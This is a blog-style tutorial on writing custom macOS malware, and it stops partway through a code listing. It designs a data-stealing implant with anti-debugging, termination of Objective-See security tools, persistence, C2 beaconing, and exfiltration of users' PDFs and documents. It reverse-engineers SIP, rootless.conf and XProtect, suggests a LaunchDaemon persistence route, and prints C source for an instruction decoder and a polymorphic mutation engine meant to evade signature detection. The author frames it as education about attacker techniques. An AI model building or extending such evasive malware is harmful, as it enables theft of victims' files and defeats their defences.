Writing a Simple macOs Malware

Today’s about writing fully custom malware targeting macOS. We’re talking raw Mach-O internals, low-level APIs, and what it really takes to slip past Apple’s security stack. Malware is fun, not the lame “steal your cat pics” kind, but the “how far can we contort a Mach-O before SIP loses its mind” kind. This piece covers some known techniques and isn’t here to hand you malware, so don’t get it twisted.

There’s nothing fancy or groundbreaking just the basics anyone with some free time and bad ideas can mess around with. Some familiarity with malware development is expected. I don’t care if you’re on Linux or Windows techniques may vary, but the core concepts stay the same.

As usual, I’ll lay out the mechanics first, theory, intent, then implementation, runtime mutation, anti-analysis, and pure native API. This isn’t for people looking to copy-paste and feel clever. It’s for those who want to understand how things work.

In the first paper I put out, I kept things simple, used a stub to demo mutation without going deep into the piece itself. It was basic, close to the metal, and I didn’t want to overload the write-up. But on second thought? Fuck it. Let’s do a proper introduction, built on old tricks but tuned for macOS architecture.

So how does this work, what’s the goal, and why these techniques? This project came out of hours spent reversing macOS malware and thinking how would I implement this more efficiently? All the code here is stripped-down stubs, designed to clearly demonstrate each technique in action without the noise of a full payload.

macOS has defenses, but they aren’t invincible. If you know the right APIs, Mach-O internals, and runtime hooks to target, the system practically hands you the building blocks. This article digs into those layers and shows how the pieces fit together in practice.

You wanna skip all of this and grab the package. If you want to dig through it yourself, grab it in Github. It’s raw, incomplete, and needs work to actually run. Some parts were left unfinished on purpose. And if something feels off, that’s not a mistake. Each architecture gets its own full instruction decoder, analyzer, and mutation engine.

x86-64 (Intel/AMD processors)
ARM64 (Apple Silicon) - Very basic.

All of it was tested on macOS 14+ (Sonoma). No promises it’ll run clean everywhere, your mileage may vary. If there’s a better source for something, I’ll link it. And if you’re done with the preamble.

+------------------------------------------------------------+
|                       INTIAL DESIGN                        |
+------------------------------------------------------------+

[ENTRY POINT] 
       |
       v
[ANTI-DEBUG / SELF-CHECK] -------------------------+
       |                                           |
       | debugger/emulator detected?               |
       v                                           v
   [WARN USER]                                 [CONTINUE]
("this app won't work")                            |
       |                                           |
[self-modify / corrupt / inject]                   |
       |                                           |
       +------------> [PANIC MODE] <---------------+
                           |
        search for same-sample pre-runtime signature
                           |
                 if found -> do nothing

[HOST AUDIT]  (only if no debugging/emulation)
       |
       v
 scan for AV / Objective-See tools
       |
       +--> if tool detected -> schedule termination
       |     (not first run, evasion checks, prep steps)
       |
       +--> otherwise -> continue

[PERSISTENCE & MUTATION]
       |
       v
  - self-modifying code 
  - persistence routines
       |
       v
[C2 INIT]
       |
       v
  - send host metadata
  - wait for C2 confirmation
       |
       v
[FILE COLLECTION]
       |
       v
  - scan recent folder for PDFs, DOCs ...
  - pack/encrypt/zip
  - send to C2

On each execution, it can change its binary signature, file hash, and even parts of its logic, unique variant on the victim’s machine. This renders traditional signature-based detection useless, More on This we will learn why?

The “suicide pill” is more than just self-deletion. It actively hunts the system for other copies of itself by searching for a unique “pre-runtime signature.” The logic is if another copy exists, this must be already infected machine so annulé or highly possible it’s an analyst’s machine (not a real victim’s) terminating all found copies.

Audit? What I mean is, we gonna look for very specific tools used by macOS users as sorta AV stuff. These tools are developed by Objective-See open-source are free anti-malware tools that can fuck up our operation (not really, but still, said why not?). It will scan; if any of these tools are running alongside the malware, they will be killed and will never run again while the malware is running, But these kills follow a specific schedule and triggers, not random or on first run. For evasion, we take a few preparatory steps before terminating these tools, and only after certain conditions are met. This reduces predictability

Initiate a C2 connection and send the basic metadata about the host to the C2. Then, once the C2 confirms the metadata and we got a receiver, it will launch and scan for PDF files, docs, and certain extensions within the recent folder to minimize evasion and for stealth, always hit the “low-hanging fruit” first. It’ll pack, encrypt, and compose a zip containing the files and send ‘em to the C2.

This is a very simple design. It’s got flaws and weaknesses and can be killed too. This piece is here to provide already known TTPs and techniques used by actors and give you an insight into a malware author’s perspective and development phases, so you can understand the threat module.

Challenges

Before touching macOS internals, understand how the OS enforces its own security. This isn’t about passwords or user gates, macOS isolates critical components, adding multiple layers of protection around core files and processes. Key mechanisms include System Integrity Protection (SIP), firmlinks, entitlements, and plist-based configurations. Each plays a role in controlling access and behavior.

System Integrity Protection
Gatekeeper/XProtect
Runtime/Memory execution

First Off, SIP restricts modification of core system locations. Directories like /System, /usr, /bin, /sbin, and parts of /Library are read-only, regardless of user privileges. SIP also validates kernel extensions goes by (kexts), unsigned or improperly signed kexts are blocked. System processes are protected against code injection, tampering, and unauthorized debugging. When active, SIP marks restricted directories to enforce these rules, focusing only on essential system paths.

SIP is enabled, showing that the system is actively using its security features. The “restricted” flag on certain directories indicates SIP’s protection of those specific areas. Note that restrictions may not automatically apply to subdirectories within a protected directory.

SIP isn’t a single program you can flip on or off. It’s made up of several components, which is why you have to boot into Recovery mode to disable it. Let’s take a quick look at csrutil.

From what we’ve seen, we followed the enable subcommand to its reference in the entry point, which is exactly what you’d expect for csrutil. The entry sets up the stack and saves registers, then checks if argc is one and jumps to the usage routine if so. It grabs argv[1] and runs strcmp in sequence against the supported subcommands: clear, disable, enable, netboot, report, status, verify-factory-sip, and authenticated-root. Each strcmp that matches jumps to its respective handler. For enable, it jumps to sub_1000020a4. let’s call it csrutil_enable

Inside csrutil_enable, the function allocates a small stack block (__NSConcreteStackBlock) and populates it with flags, a pointer to the block’s invoke function, a context pointer, and the original argc/argv values. This block is then passed to sub_100001ecf > csrutil_dispatch. That call sets up the environment to execute the actual enable logic and abstracts the block-based Objective-C message dispatch. After returning from csrutil_dispatch, the stack is restored and the function returns to the entry point’s flow.

The real work happens in csrutil_enable, the invoke function of the block. Here, the object retained from the stack block is called repeatedly via _objc_msgSend with selectors to turn on specific SIP protections: setKextSigningRequired:, setFilesystemAccessRestricted:, setNVRAMAccessRestricted:, … Each call sets the corresponding SIP flag in memory. After configuring all, the function calls a helper sub_100006164 let’s rename it to csrutil_persist with arguments from the block, releases the retained object, prints “System Integrity Protection is on.”, and returns.

So far, what we’ve seen in csrutil enable is mostly Objective-C message dispatch: it’s toggling internal flags in memory and calling a helper csrutil_persist at the end of sub_1000020ee. That helper is where the real persistence happens, the internal SIP flags you saw set with _objc_msgSend don’t survive reboot by themselves. macOS stores the actual SIP state in NVRAM under the key csr-active-config.

When the helper csrutil_persist (or its equivalent in the CSRSecurityConfig class) runs, it takes the in-memory SIP flags and packages them into a 32-bit (or 64-bit, depending on architecture and OS version) bitmask. This mask represents which SIP features are enabled or disabled. The method then opens the /options node in the device tree using IORegistryEntryFromPath("IODeviceTree:/options").

Once it has that node, it uses CFDataCreateWithBytesNoCopy to wrap the raw flags in a CFData object and calls IORegistryEntrySetCFProperty to write it to the csr-active-config key.

This write is necessary without it, any changes you make with csrutil enable or csrutil disable would vanish on reboot. The system reads this same NVRAM key at boot (through +[CSRSecurityConfig loadConfigurationFromNVRAM:] or equivalent early-boot code), converts the CFData back into in-memory flags, and enforces them.

Similarly, csrutil clear or the disable path doesn’t just toggle flags in memory; it calls +[CSRSecurityConfig clearConfigurationFromNVRAM:], which deletes the csr-active-config entry from /options using the IONVRAM delete semantics. makes sure the next boot has a clean slate. There are multiple implementation details across macOS versions (write-zero vs explicit delete), but the conceptual flow is the same: csrutil only changes the stored configuration; enforcement happens after the kernel reads that configuration at boot.

So what this means ?

SIP = kernel-enforced protections. These are implemented in XNU (and associated kernel checks) and operate at syscall/vnode/kext-load/ptrace/etc. hooks. There’s no persistent userland daemon that “enforces” SIP on running processes the kernel and early-boot code do.
csrutil = front-end configuration tool. It prepares flags in memory and commits them to NVRAM (csr-active-config). It does not itself enforce the protections at runtime; it only configures what the kernel will enforce on the next boot.

Everything else in csrutil before the commit is just preparation the actual persistent SIP state always funnels through this key. so you’re enabling or disabling it ? the process is kinda stays the same.

Keep in mind: the function names, offsets … and stack/block layouts discussed in this piece were obtained by reverse-engineering a specific macOS build and architecture. These are implementation details, not public APIs, and may change between macOS releases, updates, and architectures (Intel vs Apple Silicon).

The idea is: even if malware got root privileges, it still cannot tamper with many system integrity protections because SIP imposes a predefined set of restrictions a global policy enforced by the kernel. These restrictions override and are enforced independently of an app’s normal sandbox profile. Together, SIP plus code-signature/entitlement checks form a broader protection model. It differs from traditional sandbox profiles but follows a similar principle the system enforces what processes (even root) can and cannot do.

!w / > cat /System/Library/Sandbox/rootless.conf
				/Applications/Safari.app
				/Library/Apple
TCC				/Library/Application Support/com.apple.TCC
CoreAnalytics			/Library/CoreAnalytics
NetFSPlugins			/Library/Filesystems/NetFSPlugins/Staged
NetFSPlugins			/Library/Filesystems/NetFSPlugins/Valid
KernelExtensionManagement	/Library/GPUBundles
KernelExtensionManagement	/Library/KernelCollections
...

!w / > ls -ld@ /System                                                           
drwxr-xr-x@ 9 root  wheel  288 Jul 1  202. /System
	com.apple.rootless	  0

!w / > file /usr/libexec/rootless-init
/usr/libexec/rootless-init: Mach-O universal binary with 2 architectures: 
- Mach-O 64-bit executable x86_64] 
- Mach-O 64-bit executable arm64e]

This file rootless.conf is loaded on boot by rootless-init, so it is possible to edit the _rootless.conf_ while SIP is disabled to customize the path exception list, so From rootless.conf we can see the following policies enforced for all users, root itself.

Processes fall under SIP protection if they’re marked as restricted. That happens when the binary contains a __RESTRICTsegment or when the com.apple.rootless extended attribute is set with the restricted flag.

On macOS, entitlements are permission slips baked into an app’s signature. They spell out what the app can reach form, network, files, hardware hooks, or private user data. No entitlement, no access. With the right one, the system opens that door, but only as far as Apple allows.

Based on this, we can assume that certain entitlements can bypass SIP. If a standard user or root has access to these entitlements and can alter their execution flow, it effectively constitutes a SIP bypass. The relevant entitlements are:

....
[Dict]
	[Key] com.apple.rootless.install
	[Value]
		[Bool] true
	[Key] com.apple.rootless.critical
	[Value]
		[Bool] true
[Dict]
	[Key] com.apple.rootless.install.heritable
	[Value]
		[Bool] true

Malware could exploit this to establish persistence, if a path is specified in rootless.conf but does not exist on the filesystem, it can be created. we could create a PLIST in /System/Library/LaunchDaemons if it is listed in rootless.conf but doesn’t yet exist.

The reverse scenario is also possible: if an update or modification to rootless.conf blacklists a location, malware that has already created files there can remain persistent despite the new restrictions.

Reference:

Gatekeeper/XProtect

So, why go with all of this? Why not just use raw malware? With macOS’s security features one might argue that it’s pointless, As one may say:
“If your objective does not require a high success rate and your time is limited, you can code something that isn’t protected at all and simply use it as-is.”

Back in the day, and still today, AV and EDR solutions lean hard on static analysis. They hunt with pattern matching against known byte sequences (YARA rules and the like), heuristics that scan instruction patterns and control flow, string-based checks on API calls and library imports, plus entropy analysis to sniff out packed or encrypted sections.

Throw in hash checks and structural scans of PE or Mach-O headers and sections, and you’ve got the usual toolkit. Some even try behavioral pattern recognition based solely on static code.

But here’s the catch: all these methods share the same blind spot. They bank on the idea that code’s structure stays constant across every copy. Like a fingerprint, malicious code is assumed to keep its core shape no matter when or where it shows up.

All these old-school static checks are exactly what Apple’s XProtect banks on, heavy reliance on static signatures to catch known threats. So I started wondering:

_how well does XProtect really hold up against a shape-shifting binary? Apple says their detection uses generic rules, not just fixed hashes, to snatch unseen variants. But honestly? I was skeptical. So, let’s crack open XProtect’s guts while it’s still fresh in my head.

When you open a file double-click or run from terminal, LaunchServices kicks in and sends an XPC message to CoreServicesUIAgent, the UI handler for app launches. From there, CoreServicesUIAgent calls XprotectService.xpc, located inside the XProtectFramework:

/System/.../XprotectService (x86_64): Mach-O 64-bit executable
/System/.../XprotectService (arm64e): Mach-O 64-bit executable

Two main players in this story: Gatekeeper (XPGatekeeperEvaluation) and XProtect (XProtectAnalysis). Gatekeeper deals with code-signing, notarization, and policy enforcement. XProtect does the dirty work, core malware scanning, running in its own XPC sandbox for isolation.

Everything starts with the assessmentContext. When a file’s about to open, Gatekeeper builds a dossier on it, an NSMutableDictionary called assessmentContext. That thing holds all the juicy metadata: file type under kSecAssessmentContextKeyUTI, origin URL if it was downloaded (LSDownloadDestinationURLKey), and whether the file’s been notarized (assessmentWasNotarized). This context becomes the deciding factor for what happens next.

Inside the binary, execution paths are sorted by operation type, execute, install, open, with a straight cmp against constants:

cmp eax, 0x2
je loc_100006f3a
cmp eax, 0x1
je loc_100006f64
...
mov rax, qword [_kSecAssessmentOperationTypeExecute_1000140c8]

From there, the context gets filled out with Objective-C message calls. For example, loading the UTI and stuffing it into the dictionary:

mov rdx, qword [r13+rax] ; Load UTI
mov rax, qword [_kSecAssessmentContextKeyUTI_1000140c0]
mov rcx, qword [rax]
mov rdi, r14 ; dictionary
mov rsi, r12 ; selector: setObject:forKey:
call rbx ; objc_msgSend

It even tries to pull a separate download assessment dictionary if one exists. That tells you how deep the inspection pipeline goes, this isn’t just a surface-level check, it’s context-driven and pretty granular.

Once the assessmentContext is in place, XProtectService moves into policy eval mode. It pulls in XProtect’s rule files, XProtect.plist and XProtect.meta.plist using CoreFoundation APIs and parses them into memory.

From there, it starts matching rules against file attributes: UTI, path, quarantine flags, code signature data. Everything gets checked to figure out if the file fits any known threat pattern.

Notarization status comes from cached flags, not any live verification. You see it in the binary:

movsx eax, byte [rdi+rax] ; notarization flag

That shortcut keeps things fast, but it means the decision relies on whatever data was already there, no real-time notarization lookup happening.

XProtect doesn’t do the scanning itself. Instead, it delegates to com.apple.XprotectFramework.AnalysisService over XPC Apple’s interprocess communication layer. That separation keeps the scanning sandboxed, reducing the risk of crashes or exploits hitting the main system.

Inside the service, analysis kicks off by resolving aliases and symlinks before touching file content. It checks things like quarantine flags, walking through the metadata before digging deeper:

-[XProtectAnalysis beginAnalysisWithHandler:...]:
mov rax, [_NSURLIsAliasFileKey]
mov rax, [_NSURLIsSymbolicLinkKey]
call objc_msgSend ; arrayWithObjects:count:

Once scanning wraps, the file gets tagged with metadata like XProtectMalwareType, and the results are kicked back to CoreServicesUIAgent

If a file gets flagged, CoreServicesUIAgent steps in, flashes an alert, and dumps it in the Trash even if it’s signed and looks clean on the surface.

Why this matters:
CoreServicesUIAgent uses identifiers like XProtectMalwareType to classify and act on files. But that whole system depends on static signatures. Mutating binaries that shift shape with every execution? They throw a wrench in the pattern-matching logic and can easily slide past unnoticed.

So is that it? Hell nah. each layer designed to slow you down, throw you off, or straight up brick your flow. Sure, mutation can knock out XProtect’s static signature checks, but that’s just one wall. There’s still runtime behavioral monitoring, network traffic inspection, and system-level policy enforcement. And yeah this assumes you’re actually dropping a payload, because otherwise… what’s the point?

And Gatekeeper? It’s focused on code signing and notarization. If your binary is signed even self-signed, and the quarantine bit’s removed, Gatekeeper mostly stands down, trusting XProtect to catch the threat. But again, if we mutate, XProtect can’t match what it’s never seen.

See:

Wisp

Now that we know what breaks macOS main “anti-malware”, let’s write a mutation engine to help our piece mutate on each execution, performing in-place sweeping and mutation. But first things first doing this on macOS is a little trickier than on Linux. It falls under self-modifying code, which I’d say has more cons than pros but we’ll discuss that as we go.

For now, let’s focus on the engine: what it’s going to do, how it’s going to work, and how we’ll achieve this mutation, and most importantly, how we’ll implement it on macOS.

Alright, let’s call it Wisp, the functional core of the whole thing. We need to transform a buffer of machine code into a different, semantically equivalent buffer. The engine itself doesn’t need to know how to parse Mach-O or its origin it doesn’t care. The engine’s only concern is mutating the code while guaranteeing that such code remains executable and functionally identical.

[ Register Reassignment ] ---> [ Instruction Substitution ] ---> [ Junk Code ] 
          |                                                             |
          |                                                             v
          |---------------------------> [ Validation & Repair ] ---> [ Out ]
          |
          +---> [ Control Flow Obfuscation ] ---> [ Opaque Predicates ] <---+

So what we want to do is perform targeted, semantic-preserving transformations instead of random, destructive bit-flipping. What you usually see is raw bytes being stored or input, then bits flipped at random and called a day which typically generates a lot of useless results. That’s basically blind mutation, and it often produces nonsense.

Instead of blindly following that let’s apply transformations that are structure-aware, guided by rules. For this, our engine needs an x64/ARM instruction decoder. We could use something like Capstone, but I ended up writing my own (very simple)

decoder_x68.c

/*-------------------------------------------
   ARCHX86 
-------------------------------------------*/

#if defined(ARCH_X86)
uint8_t modrm_reg(uint8_t m);
uint8_t modrm_rm(uint8_t m);

static inline bool is_legacy_prefix(uint8_t b) {
  return b == 0xF0 || b == 0xF2 || b == 0xF3 ||
    b == 0x2E || b == 0x36 || b == 0x3E ||
    b == 0x26 || b == 0x64 || b == 0x65 ||
    b == 0x66 || b == 0x67;
}

static inline bool is_rex(uint8_t b) {
  return (b & 0xF0) == 0x40;
}

static void parse_rex(x86_inst_t * inst, uint8_t rex) {
  inst -> rex = rex;
  inst -> rex_w = (rex >> 3) & 1;
  inst -> rex_r = (rex >> 2) & 1;
  inst -> rex_x = (rex >> 1) & 1;
  inst -> rex_b = (rex >> 0) & 1;
}

static inline uint8_t modrm_mod(uint8_t m) {
  return (m >> 6) & 3;
}
static inline uint8_t sib_scale(uint8_t s) {
  return (s >> 6) & 3;
}
static inline uint8_t sib_index(uint8_t s) {
  return (s >> 3) & 7;
}
static inline uint8_t sib_base(uint8_t s) {
  return s & 7;
}

static inline bool have(const uint8_t * p,
  const uint8_t * end, size_t n) {
  return (size_t)(end - p) >= n;
}

static uint64_t read_imm_le(const uint8_t * p, uint8_t size) {
  uint64_t v = 0;
  for (uint8_t i = 0; i < size; i++) v |= ((uint64_t) p[i]) << (i * 8);
  return v;
}

static int64_t read_disp_se(const uint8_t * p, uint8_t size) {
  uint64_t u = read_imm_le(p, size);
  if (size == 1) return (int8_t) u;
  if (size == 2) return (int16_t) u;
  return (int32_t) u;
}

static bool parse_vex_evex(x86_inst_t * inst,
  const uint8_t ** p,
    const uint8_t * end) {
  if (!have( * p, end, 1)) return false;

  uint8_t first_byte = ** p;
  if (first_byte == 0x62) {
    if (!have( * p, end, 4)) return false;
    inst -> evex = true;
    * p += 4;
    return true;
  } else if (first_byte == 0xC4) {
    if (!have( * p, end, 3)) return false;
    inst -> vex = true;
    * p += 3;
    return true;
  } else if (first_byte == 0xC5) {
    if (!have( * p, end, 2)) return false;
    inst -> vex = true;
    * p += 2;
    return true;
  }

  return false;
}

static bool is_cflow(uint8_t op0, uint8_t op1, bool has_modrm, uint8_t modrm) {
  if (op0 == 0xC3 || op0 == 0xCB || op0 == 0xC2 || op0 == 0xCA) return true;
  if (op0 == 0xE8 || op0 == 0xE9 || op0 == 0xEB || op0 == 0xEA || op0 == 0x9A) return true;
  if (op0 >= 0x70 && op0 <= 0x7F) return true;
  if (op0 == 0x0F && op1 >= 0x80 && op1 <= 0x8F) return true;
  if (op0 >= 0xE0 && op0 <= 0xE3) return true;
  if (op0 == 0xFF && has_modrm) {
    uint8_t r = modrm_reg(modrm);
    if (r == 2 || r == 3 || r == 4 || r == 5) return true;
  }
  return false;
}

static bool needs_modrm(uint8_t op0, uint8_t op1) {
  if (op0 == 0x0F) {
    if ((op1 & 0xF0) == 0x10 || (op1 & 0xF0) == 0x20 || (op1 & 0xF0) == 0x28 ||
      (op1 & 0xF0) == 0x38 || (op1 & 0xF0) == 0x3A) return true;
  }
  if ((op0 >= 0x88 && op0 <= 0x8E) || op0 == 0x8F) return true;
  if (op0 == 0x01 || op0 == 0x03 || op0 == 0x29 || op0 == 0x2B ||
    op0 == 0x31 || op0 == 0x33 || op0 == 0x21 || op0 == 0x23 ||
    op0 == 0x09 || op0 == 0x0B || op0 == 0x39 || op0 == 0x3B ||
    op0 == 0x85 || op0 == 0x87 || op0 == 0x8D || op0 == 0xFF ||
    op0 == 0x81 || op0 == 0x83 || op0 == 0xC7) return true;
  return false;
}

static bool needs_imm(uint8_t op0, uint8_t op1, bool has_modrm, uint8_t modrm) {
  (void) op1;
  (void) has_modrm;
  (void) modrm;
  if (op0 >= 0xB8 && op0 <= 0xBF) return true;
  if (op0 == 0xC7) return true;
  if (op0 == 0x81 || op0 == 0x83) return true;
  if (op0 == 0xE8 || op0 == 0xE9 || op0 == 0xEB) return true;
  if (op0 >= 0x70 && op0 <= 0x7F) return true;
  if (op0 == 0x0F && (op1 >= 0x80 && op1 <= 0x8F)) return true;
  if (op0 >= 0xE0 && op0 <= 0xE3) return true;
  if (op0 == 0xC2 || op0 == 0xCA) return true;
  return false;
}

static uint8_t imm_size_for(uint8_t op0, uint8_t op1, bool rex_w, bool opsz16) {
  (void) op1;

  if (op0 >= 0xB8 && op0 <= 0xBF) {
    if (rex_w) return 8;
    return opsz16 ? 2 : 4;
  }

  switch (op0) {
  case 0xC7:
  case 0x81:
    return opsz16 ? 2 : 4;

  case 0x83:
    return 1;

  case 0xE8:
  case 0xE9:
    return 4;

  case 0xEB:
    return 1;

  case 0xC2:
  case 0xCA:
    return 2;

  default:

    if (op0 == 0x0F) {
      if (op1 >= 0x80 && op1 <= 0x8F) return 4;
    }

    if ((op0 >= 0x70 && op0 <= 0x7F) ||
      (op0 >= 0xE0 && op0 <= 0xE3)) {
      return 1;
    }
  }

  return 0;
}

static void resolve_target(x86_inst_t * inst, uintptr_t ip) {
  if (!inst -> valid) return;
  uint8_t o0 = inst -> opcode[0], o1 = inst -> opcode[1];

  if (o0 == 0xE8) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int32_t) inst -> imm;
  } else if (o0 == 0xE9) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int32_t) inst -> imm;
  } else if (o0 == 0xEB) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int8_t) inst -> imm;
  } else if (o0 >= 0x70 && o0 <= 0x7F) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int8_t) inst -> imm;
  } else if (o0 == 0x0F && (o1 >= 0x80 && o1 <= 0x8F)) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int32_t) inst -> imm;
  } else if (o0 >= 0xE0 && o0 <= 0xE3) {
    inst -> modifies_ip = true;
    inst -> target = ip + inst -> len + (int8_t) inst -> imm;
  } else if (o0 == 0xFF && inst -> has_modrm) {
    uint8_t r = modrm_reg(inst -> modrm);
    if (r == 2 || r == 3 || r == 4 || r == 5) {
      inst -> modifies_ip = true;
      inst -> target = 0;
    }
  } else if (o0 == 0xEA || o0 == 0x9A) {
    inst -> modifies_ip = true;
    inst -> target = 0;
  } else if (o0 == 0xC2 || o0 == 0xCA || o0 == 0xC3 || o0 == 0xCB) {
    inst -> modifies_ip = true;
    inst -> target = 0;
  }
}

static void parse_ea_and_disp(x86_inst_t * inst,
  const uint8_t ** p,
    const uint8_t * end,
      bool addr32_mode, bool rex_b, bool * has_sib_out) {
  uint8_t m = inst -> modrm;
  uint8_t mod = modrm_mod(m), rm = modrm_rm(m);

  uint8_t extended_rm = rm;
  if (rex_b) extended_rm |= 0x8;

  inst -> has_sib = false;

  if (mod != 3 && rm == 4) {
    if (!have( * p, end, 1)) {
      inst -> valid = false;
      return;
    }
    inst -> has_sib = true;
    inst -> sib = * ( * p) ++;

    if (has_sib_out) * has_sib_out = true;

    uint8_t base = sib_base(inst -> sib);
    if (base == 5 && mod == 0) {

      if (!have( * p, end, 4)) {
        inst -> valid = false;
        return;
      }
      inst -> disp_size = 4;
      inst -> disp = read_disp_se( * p, 4);
      * p += 4;
    }
  }

  if (mod == 1) {
    if (!have( * p, end, 1)) {
      inst -> valid = false;
      return;
    }
    inst -> disp_size = 1;
    inst -> disp = read_disp_se( * p, 1);
    * p += 1;
  } else if (mod == 2) {
    if (!have( * p, end, 4)) {
      inst -> valid = false;
      return;
    }
    inst -> disp_size = 4;
    inst -> disp = read_disp_se( * p, 4);
    * p += 4;
  } else if (mod == 0) {

    if (extended_rm == 5 && !addr32_mode) {
      if (!have( * p, end, 4)) {
        inst -> valid = false;
        return;
      }
      inst -> disp_size = 4;
      inst -> disp = read_disp_se( * p, 4);
      * p += 4;
      inst -> rip_relative = true;
    }
  }
}

bool decode_x86_withme(const uint8_t * code, size_t size, uintptr_t ip, x86_inst_t * inst, memread_fn mem_read) {
  (void) mem_read;
  memset(inst, 0, sizeof( * inst));
  inst -> valid = true;

  const uint8_t * p = code;
  const uint8_t * end = size ? (code + size) : (code + 15);

  bool have_lock = false, have_rep = false, have_repne = false;
  bool opsz16 = false, addrsz32 = false;
  uint8_t seg_override = 0;

  while (p < end) {
    if (!have(p, end, 1)) break;
    uint8_t b = * p;

    if (is_rex(b)) {
      parse_rex(inst, b);
      p++;
      continue;
    }

    if (!is_legacy_prefix(b)) break;

    switch (b) {
    case 0xF0:
      have_lock = true;
      break;
    case 0xF3:
      have_rep = true;
      break;
    case 0xF2:
      have_repne = true;
      break;
    case 0x66:
      opsz16 = true;
      break;
    case 0x67:
      addrsz32 = true;
      break;
    default:
      if (b == 0x2E || b == 0x36 || b == 0x3E ||
        b == 0x26 || b == 0x64 || b == 0x65) {
        seg_override = b;
      }
      break;
    }
    p++;

    if ((size_t)(p - code) >= 15) break;
  }

  if (!have(p, end, 1)) {
    inst -> valid = false;
    return false;
  }

  if (!parse_vex_evex(inst, & p, end)) {

    if (!have(p, end, 1)) {
      inst -> valid = false;
      return false;
    }
  }

  inst -> opcode[0] = * p++;
  inst -> opcode_len = 1;

  if (inst -> opcode[0] == 0x0F) {
    if (!have(p, end, 1)) {
      inst -> valid = false;
      return false;
    }
    inst -> opcode[1] = * p++;
    inst -> opcode_len++;

    if (inst -> opcode[1] == 0x38 || inst -> opcode[1] == 0x3A) {
      if (!have(p, end, 1)) {
        inst -> valid = false;
        return false;
      }
      inst -> opcode[2] = * p++;
      inst -> opcode_len++;
    }
  }

  bool has_sib = false;
  if (needs_modrm(inst -> opcode[0], inst -> opcode[1])) {
    if (!have(p, end, 1)) {
      inst -> valid = false;
      return false;
    }
    inst -> has_modrm = true;
    inst -> modrm = * p++;

    parse_ea_and_disp(inst, & p, end, addrsz32, inst -> rex_b, & has_sib);
    if (!inst -> valid) return false;
  }

  if (needs_imm(inst -> opcode[0], inst -> opcode[1], inst -> has_modrm, inst -> modrm)) {
    inst -> imm_size = imm_size_for(inst -> opcode[0], inst -> opcode[1], inst -> rex_w, opsz16);
    if (inst -> imm_size > 0) {
      if (!have(p, end, inst -> imm_size)) {
        inst -> valid = false;
        return false;
      }
      inst -> imm = read_imm_le(p, inst -> imm_size);
      p += inst -> imm_size;
    }
  }

  inst -> len = (uint8_t)(p - code);
  if (inst -> len > 15) inst -> len = 15;

  memcpy(inst -> raw, code, inst -> len);

  inst -> is_control_flow = is_cflow(inst -> opcode[0], inst -> opcode[1], inst -> has_modrm, inst -> modrm);
  inst -> lock = have_lock;
  inst -> rep = have_rep;
  inst -> repne = have_repne;
  inst -> seg = seg_override;
  inst -> opsize_16 = opsz16;
  inst -> addrsize_32 = addrsz32;

  resolve_target(inst, ip);

  return inst -> valid;
}

bool decode_x86(const uint8_t * code, uintptr_t ip, x86_inst_t * inst, memread_fn mem_read) {
  return decode_x86_withme(code, 15, ip, inst, mem_read);
}

#endif

What we’re doing here is basically asking, can I move this, can I swap that, and so on. We keep track of the ModR/M and which registers are being used. There’s len, which tells us how many bytes we need to overwrite, and target, which is about where the branch goes, that one’s for CFG.

This way the engine knows how to find all the MOV instructions, avoid messing with jmp trash, and also understand that you can change something like mov e, ebx into mov eax, ecx On top of that, it recalculates the offsets whenever a block of code gets moved around.

You can find the ARM decoder in here > arm64

Alright we got that out of the way, let’s get back to the engine we can connect the dots later as we proceed. so, we wanna start with basic, simple register/memory ops, something that generates like xor eax, dword ptr [rax] <-> add eax, dword ptr [rax].

Half the time you want the transformation to be reversible, so applying another rule from the same family lets add turn into xor and back again. What we’re really doing is playing opportunistically, and the classic move here is just zeroing out a register.

With memory-operand instructions, swapping the opcode usually doesn’t need any special setup the op just changes. The catch is you’ve gotta watch for instructions where the ModR/M byte shows a reg + mem combo. That’s where the decoder comes in. Once you’ve nailed that, you just flip the opcode and keep the ModR/M byte as is, so the operands don’t move.

Both instructions operate on the same operands (eax and [rax]), but the opcode changes (xor vs add). meaning swapping one instruction with another legal instruction to build a foundation for more transformations later on. Also some maybe Arithmetic stuff like add -> lea more variety while keeping mutations meaningful, not random trash.

After a change, the idea is immediately runs the new bytes through the decoder. If we can’t make sense of it, the mutation gets rolled back on the spot. That’s playin’ safe no “random trash,” even if a rule hits some weird edge case.

meaning one instruction can go through several mutation passes. It might start as an add, get swapped to an xor, then have its registers remapped into something like xor ecx, [rdx], and later pick up a junk nop shoved in front.

static void scramble_x86(uint8_t * code, size_t size, chacha_state_t * rng, unsigned gen,
  muttt_t * log, liveness_state_t * liveness, unsigned mutation_intensity) {
  size_t offset = 0;

  if (liveness) boot_live(liveness);

  while (offset < size) {
    const int WINDOW_MAX = 8;
    x86_inst_t win[WINDOW_MAX];
    size_t win_offs[WINDOW_MAX];

    int win_cnt = build_instruction_window(code, size, offset, win, win_offs, WINDOW_MAX);

    window_reordering(code, size, win, win_offs, win_cnt, rng,
      mutation_intensity, log, gen);

    x86_inst_t inst;
    if (!decode_x86_withme(code + offset, size - offset, 0, & inst, NULL) || !inst.valid || inst.len == 0 || offset + inst.len > size) {
      offset++;
      continue;
    }

    if (liveness) pulse_live(liveness, offset, & inst);

    bool mutated = false;

    if (inst.has_modrm && inst.len <= 8) {
      uint8_t reg = modrm_reg(inst.modrm);
      uint8_t rm = modrm_rm(inst.modrm);
      uint8_t new_reg = reg;
      uint8_t new_rm = rm;

      if (liveness) {
        new_reg = jack_reg(liveness, reg, offset, rng);
        new_rm = jack_reg(liveness, rm, offset, rng);
      } else {
        new_reg = random_gpr(rng);
        new_rm = random_gpr(rng);
      }

      uint8_t orig_modrm = inst.modrm;

      if ((inst.opcode[0] & 0xF8) != 0x50 && (inst.opcode[0] & 0xF8) != 0x58) {
        for (int i = 0; i < 3 && !mutated; i++) {
          uint8_t temp_modrm = orig_modrm;
          if (i == 0) {
            temp_modrm = (orig_modrm & 0xC7) | (new_reg << 3);
          } else if (i == 1) {
            temp_modrm = (orig_modrm & 0xF8) | new_rm;
          } else {
            temp_modrm = (orig_modrm & 0xC0) | (new_reg << 3) | new_rm;
          }

          size_t modrm_offset = offset + inst.opcode_len;
          uint8_t orig_byte = code[modrm_offset];
          code[modrm_offset] = temp_modrm;
